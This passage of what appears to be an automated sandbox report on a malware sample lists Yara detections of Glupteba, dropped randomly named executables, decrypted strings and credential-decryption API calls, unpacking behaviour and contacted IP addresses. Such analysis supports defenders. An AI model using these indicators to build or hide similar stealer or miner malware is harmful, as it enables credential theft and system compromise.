                  Source: Yara matchFile source: 00000010.00000002.3306333274.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000020.00000002.3259586341.0000000000843000.00000040.00000001.01000000.0000001F.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.3275782158.00000000030F3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.3182375526.0000000000843000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: VT4T5BrKWgz9d48cmEd8ePkZ.exe PID: 7280, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: sUyDoVTGsfEnMY0oeyexTBut.exe PID: 7308, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: VvPx7JMqkEvTJAQ2rPS2y2wf.exe PID: 7392, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe PID: 7568, type: MEMORYSTR
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\SNePs0JIjHDOAKzI11CQ043K.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\IiRP3mWif0xpaQsabblBwYAE.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\IpW6W2Yjx6z6D3j66j3N2tH5.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\H7TIhgIvG1Yhal1QnwrEdA0q.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\S5LR4MxNYkipKICUEWwDRrcX.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\RLHqIpTNCBsmKjKBdfgpamFx.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Jye7PnMsJdWwQaaabqxbHITx.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\4xb6JU3I8UdzuT7ogqFnBL7Y.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: dl7WL77rkA.exeJoe Sandbox ML: detected
                  Sample uses string decryption to hide its real strings
                  Source: 15.2.syncUpd.exe.400000.0.raw.unpackString decryptor: CtIvEWInDoW
                  Source: 15.2.syncUpd.exe.400000.0.raw.unpackString decryptor: AgEBOxw
                  Source: 15.2.syncUpd.exe.400000.0.raw.unpackString decryptor: ijklmnopqrs
                  Source: 15.2.syncUpd.exe.400000.0.raw.unpackString decryptor: /#%33@@@
                  Source: 15.2.syncUpd.exe.400000.0.raw.unpackString decryptor: abcdefghijklmnopqrs
                  Source: 15.2.syncUpd.exe.400000.0.raw.unpackString decryptor: @@@@<@@@
                  Source: 15.2.syncUpd.exe.400000.0.raw.unpackString decryptor: abcdefghijklmnopqrs
                  Source: 15.2.syncUpd.exe.400000.0.raw.unpackString decryptor: "&&""..""&&"">>""&&"".."ikSQWQSQ_QBEklmn^pqrBtuvFxyzL123H5679+/|
                  Source: 15.2.syncUpd.exe.400000.0.raw.unpackString decryptor: %s\%V/yVs
                  Source: 15.2.syncUpd.exe.400000.0.raw.unpackString decryptor: %s\*.
                  Source: 15.2.syncUpd.exe.400000.0.raw.unpackString decryptor: }567y9n/S
                  Source: 15.2.syncUpd.exe.400000.0.raw.unpackString decryptor: ntTekeny
                  Source: 15.2.syncUpd.exe.400000.0.raw.unpackString decryptor: ging
                  Source: 15.2.syncUpd.exe.400000.0.raw.unpackString decryptor: PassMord0
                  Source: 15.2.syncUpd.exe.400000.0.raw.unpackString decryptor: J@@@`z`@J@@@J@@@
                  Source: 15.2.syncUpd.exe.400000.0.raw.unpackString decryptor: OPQRSTUVWXY
                  Source: 15.2.syncUpd.exe.400000.0.raw.unpackString decryptor: 456753+/---- '
                  Source: 15.2.syncUpd.exe.400000.0.raw.unpackString decryptor: '--- '
                  Source: 15.2.syncUpd.exe.400000.0.raw.unpackString decryptor: qRslaZ9Iw|
                  Source: 15.2.syncUpd.exe.400000.0.raw.unpackString decryptor: HeapFree
                  Source: 15.2.syncUpd.exe.400000.0.raw.unpackString decryptor: GetLocaleInfoA
                  Source: 15.2.syncUpd.exe.400000.0.raw.unpackString decryptor: ntProcessId
                  Source: 15.2.syncUpd.exe.400000.0.raw.unpackString decryptor: wininet.dll
                  Source: 15.2.syncUpd.exe.400000.0.raw.unpackString decryptor: shlwapi.dll
                  Source: 15.2.syncUpd.exe.400000.0.raw.unpackString decryptor: shell32.dll
                  Source: 15.2.syncUpd.exe.400000.0.raw.unpackString decryptor: .dll
                  Source: 15.2.syncUpd.exe.400000.0.raw.unpackString decryptor: column_text
                  Source: 15.2.syncUpd.exe.400000.0.raw.unpackString decryptor: }67b)>4`,LXZu2L6qd
                  Source: 15.2.syncUpd.exe.400000.0.raw.unpackString decryptor: login:
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeCode function: 12_2_00401870 CryptStringToBinaryA,CryptStringToBinaryA,_malloc,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,CertGetCertificateContextProperty,_malloc,_memset,CertGetCertificateContextProperty,_memset,_memset,_memset,_sprintf,SHGetSpecialFolderPathA,_sprintf,CertCloseStore,CertFreeCertificateContext,12_2_00401870
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeCode function: 12_2_00402C34 HeapAlloc,CryptStringToBinaryA,__FF_MSGBANNER,__NMSG_WRITE,HeapAlloc,12_2_00402C34
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeCode function: 12_2_00406739 CryptStringToBinaryA,GetLastError,___set_flsgetvalue,TlsGetValue,__calloc_crt,__decode_pointer,__initptd,GetCurrentThreadId,SetLastError,12_2_00406739
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_00406C10 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,15_2_00406C10
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_004094A0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,15_2_004094A0
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_00409540 CryptUnprotectData,LocalAlloc,LocalFree,15_2_00409540
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_004155A0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,15_2_004155A0
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_0040BF90 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,15_2_0040BF90
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_00905807 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,15_2_00905807
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_008FC1F7 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,15_2_008FC1F7
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_008F6E77 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,15_2_008F6E77
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_008F97A7 CryptUnprotectData,LocalAlloc,LocalFree,15_2_008F97A7
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_008F9707 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,15_2_008F9707

                  Bitcoin Miner

                  barindex
                  Yara detected Glupteba
                  Source: Yara matchFile source: 17.2.sUyDoVTGsfEnMY0oeyexTBut.exe.400000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 32.2.pxzTG78L668f3mDyeDkHXryr.exe.2d80e67.11.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.VT4T5BrKWgz9d48cmEd8ePkZ.exe.2da0e67.14.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.YfSmDepXBWKsGmamEEWNYwB5.exe.2dc0e67.15.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 33.2.MK1r6sTJJ0KuvAGWdjimbW8H.exe.400000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.sUyDoVTGsfEnMY0oeyexTBut.exe.2e10e67.14.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 18.2.VvPx7JMqkEvTJAQ2rPS2y2wf.exe.400000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 36.2.PM6qM9TthMxsL1RAWEhuUNLx.exe.2e10e67.15.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 32.2.pxzTG78L668f3mDyeDkHXryr.exe.400000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 18.2.VvPx7JMqkEvTJAQ2rPS2y2wf.exe.2dc0e67.15.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.YfSmDepXBWKsGmamEEWNYwB5.exe.400000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 20.2.MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe.400000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 20.2.MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe.2cb0e67.13.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.VT4T5BrKWgz9d48cmEd8ePkZ.exe.400000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.LP2uR8v5nKtflOO7HsEX74Am.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 33.2.MK1r6sTJJ0KuvAGWdjimbW8H.exe.2dc0e67.15.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 36.2.PM6qM9TthMxsL1RAWEhuUNLx.exe.400000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.LP2uR8v5nKtflOO7HsEX74Am.exe.2e80e67.14.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001E.00000002.3216770112.0000000003203000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000021.00000002.3183308151.0000000000843000.00000040.00000001.01000000.00000020.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000021.00000002.3298037878.0000000003203000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000020.00000002.3398211956.00000000031C3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000012.00000002.3306276662.0000000003203000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.3144948166.0000000000843000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.3026570515.0000000000843000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.3043788624.0000000000843000.00000040.00000001.01000000.0000001E.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000024.00000002.3409633902.0000000003253000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000012.00000002.3183446408.0000000000843000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000002.3061309929.0000000000843000.00000040.00000001.01000000.0000001C.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000024.00000002.3263335917.0000000000843000.00000040.00000001.01000000.00000022.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.3216774766.0000000003253000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000002.3250452098.00000000032C3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.3306333274.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000020.00000002.3259586341.0000000000843000.00000040.00000001.01000000.0000001F.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.3275782158.00000000030F3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.3182375526.0000000000843000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: VT4T5BrKWgz9d48cmEd8ePkZ.exe PID: 7280, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: sUyDoVTGsfEnMY0oeyexTBut.exe PID: 7308, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: VvPx7JMqkEvTJAQ2rPS2y2wf.exe PID: 7392, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe PID: 7568, type: MEMORYSTR

                  Compliance

                  barindex
                  Detected unpacking (overwrites its own PE header)
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeUnpacked PE file: 15.2.syncUpd.exe.400000.0.unpack
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeUnpacked PE file: 16.2.VT4T5BrKWgz9d48cmEd8ePkZ.exe.400000.2.unpack
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeUnpacked PE file: 17.2.sUyDoVTGsfEnMY0oeyexTBut.exe.400000.5.unpack
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeUnpacked PE file: 18.2.VvPx7JMqkEvTJAQ2rPS2y2wf.exe.400000.5.unpack
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeUnpacked PE file: 20.2.MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe.400000.2.unpack
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeUnpacked PE file: 25.2.LP2uR8v5nKtflOO7HsEX74Am.exe.400000.1.unpack
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeUnpacked PE file: 30.2.YfSmDepXBWKsGmamEEWNYwB5.exe.400000.6.unpack
                  Source: C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exeUnpacked PE file: 32.2.pxzTG78L668f3mDyeDkHXryr.exe.400000.6.unpack
                  Source: C:\Users\user\Pictures\MK1r6sTJJ0KuvAGWdjimbW8H.exeUnpacked PE file: 33.2.MK1r6sTJJ0KuvAGWdjimbW8H.exe.400000.5.unpack
                  Source: C:\Users\user\Pictures\PM6qM9TthMxsL1RAWEhuUNLx.exeUnpacked PE file: 36.2.PM6qM9TthMxsL1RAWEhuUNLx.exe.400000.3.unpack
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                  Source: unknownHTTPS traffic detected: 140.82.112.4:443 -> 192.168.2.5:49708 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.100.78.158:443 -> 192.168.2.5:51394 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.100.78.158:443 -> 192.168.2.5:51964 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 222.255.238.159:443 -> 192.168.2.5:53550 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.54.158:443 -> 192.168.2.5:55130 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.20.68.143:443 -> 192.168.2.5:55554 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.169.89:443 -> 192.168.2.5:55562 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.5:55560 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.200.219:443 -> 192.168.2.5:55569 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.200.219:443 -> 192.168.2.5:55570 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.178.183:443 -> 192.168.2.5:55573 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.178.183:443 -> 192.168.2.5:55574 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.5:55568 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.188.178:443 -> 192.168.2.5:55575 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.32.142:443 -> 192.168.2.5:55572 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.32.142:443 -> 192.168.2.5:55571 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.167.110.211:443 -> 192.168.2.5:55580 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.167.110.211:443 -> 192.168.2.5:55581 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.177.133:443 -> 192.168.2.5:55584 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.177.133:443 -> 192.168.2.5:55583 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 52.217.234.57:443 -> 192.168.2.5:55582 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.63.71:443 -> 192.168.2.5:55587 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.63.71:443 -> 192.168.2.5:55586 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.168.159:443 -> 192.168.2.5:55617 version: TLS 1.2
                  Source: dl7WL77rkA.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: Loader.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000843000.00000040.00000001.01000000.00000012.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000843000.00000040.00000001.01000000.0000000E.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000003253000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000003203000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000843000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000843000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.00000000030F3000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: EfiGuardDxe.pdb7 source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3275239614.0000000001202000.00000040.00000020.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3187282898.0000000001170000.00000040.00000020.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3269213397.0000000001022000.00000040.00000020.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3245748971.000000000110C000.00000040.00000020.00020000.00000000.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3195890952.00000000010DF000.00000040.00000020.00020000.00000000.sdmp
                  Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: symsrv.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000C7A000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.0000000003619000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000C7A000.00000040.00000001.01000000.0000000E.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000003689000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000003639000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000C7A000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.0000000003529000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000C7A000.00000040.00000001.01000000.00000011.sdmp
                  Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
